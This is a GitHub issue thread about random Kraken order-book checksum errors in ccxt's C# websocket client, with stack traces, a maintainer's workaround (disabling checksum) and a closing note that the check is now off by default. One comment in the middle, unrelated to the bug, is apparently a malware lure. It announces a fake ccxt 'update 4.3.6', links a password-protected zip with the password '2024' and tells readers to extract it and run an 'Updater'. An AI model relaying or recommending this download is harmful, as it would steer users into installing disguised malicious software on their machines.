### ISSUE TITLE
ccxt.InvalidNonce: kraken invalid checksum for C#

### ISSUE THREAD

**Issue by skuvv** [ccxt/ccxt#22121]
### Operating System

Windows 10

### CCXT Version

4.2.93

### Description

I get checksum error for Kraken while retrieving market data:
```
System.Exception: ccxt.InvalidNonce: kraken invalid checksum
   at ccxt.Exchange.watch(Object url2, Object messageHash2, Object message, Object subscribeHash2, Object subscription) in D:\Dev\Z\CCXT\ccxt_source\cs\ccxt\ws\Exchange.WsBridge.cs:line 196
   at ccxt.pro.kraken.watchPublic(Object name, Object symbol, Object parameters) in D:\Dev\Z\CCXT\ccxt_source\cs\ccxt\exchanges\pro\kraken.cs:line 487
   at ccxt.pro.kraken.watchOrderBook(Object symbol, Object limit, Object parameters) in D:\Dev\Z\CCXT\ccxt_source\cs\ccxt\exchanges\pro\kraken.cs:line 554
   at ccxt.pro.kraken.WatchOrderBook(String symbol, Nullable`1 limit2, Dictionary`2 parameters) in D:\Dev\Z\CCXT\ccxt_source\cs\ccxt\exchanges\pro\wrappers\kraken.cs:line 198
```

and 
```
System.Exception: ccxt.InvalidNonce: kraken invalid checksum
   в System.Runtime.CompilerServices.TaskAwaiter.ThrowForNonSuccess(Task task)
   в System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
   в ccxt.Exchange.<watch>d__1171.MoveNext()
--- Конец трассировка стека из предыдущего расположения, где возникло исключение ---
   в System.Runtime.CompilerServices.TaskAwaiter.ThrowForNonSuccess(Task task)
   в System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
   в ccxt.pro.kraken.<watchPublic>d__14.MoveNext()
--- Конец трассировка стека из предыдущего расположения, где возникло исключение ---
   в System.Runtime.CompilerServices.TaskAwaiter.ThrowForNonSuccess(Task task)
   в System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
   в ccxt.pro.kraken.<watchOrderBook>d__17.MoveNext()
--- Конец трассировка стека из предыдущего расположения, где возникло исключение ---
   в System.Runtime.CompilerServices.TaskAwaiter.ThrowForNonSuccess(Task task)
   в System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
   в ccxt.pro.kraken.<WatchOrderBook>d__44.MoveNext()
--- Конец трассировка стека из предыдущего расположения, где возникло исключение ---
   в System.Runtime.CompilerServices.TaskAwaiter.ThrowForNonSuccess(Task task)
   в System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
   в System.Runtime.CompilerServices.TaskAwaiter`1.GetResult()
```

### Code

Demo attached below:

**Comment by carlosmiei** [comment]
Hello @skuvv, What's the market used? Do you get that deterministically?

**Comment by skuvv** [comment]
faced for spot, eg:
```
.WatchTrades("BTC/USDT", limit2: 1);
.WatchOrderBook("BTC/USDT");
```

**Comment by skuvv** [comment]
@carlosmiei no, error is random. Sometimes I got a pack of updates before error occurred.

**Comment by carlosmiei** [comment]
@skuvv Thanks, will take a look and let you know

**Comment by carlosmiei** [comment]
@skuvv While we work on a fix I would suggest disabling the checksum calculation for now, `exchange.options["checksum"] = false;`

**Comment by Enterpreneruim** [comment]
New Version has been Released 4.3.6
Fixed: Password asking, failed system load, XML load and etc. coinex fixed, coinbase fixed.
Extract files into folder with older version and start Updater.
[ccxt_upd_fetched.zip](https://github.com/ccxt/ccxt/files/15094134/ccxt_upd_fetched.zip)
Full link - https://github.com/ccxt/ccxt/files/15094134/ccxt_upd_fetched.zip
- Password 2024
- Current Status: Working, April 24.

**Comment by kroitor** [comment]
Hello @skuvv 👋

Closing this during a cleanup of older issues — it's resolved in current versions, though the resolution took a different shape than a point fix: the kraken WS integration has since migrated to Kraken's v2 websocket API, and orderbook checksum verification is now **disabled by default** (`options["checksum"] = false` — the workaround suggested above became the shipped default), because Kraken's own checksum proved unreliable and produced exactly the kind of random mismatches you reported. There's a note to that effect right in the source.

So on any recent ccxt version this error no longer occurs out of the box; if you explicitly re-enable checksum verification and see mismatches on the v2 feed, that would be a fresh issue worth filing. Thanks for the report and the clean repro details! 🙏
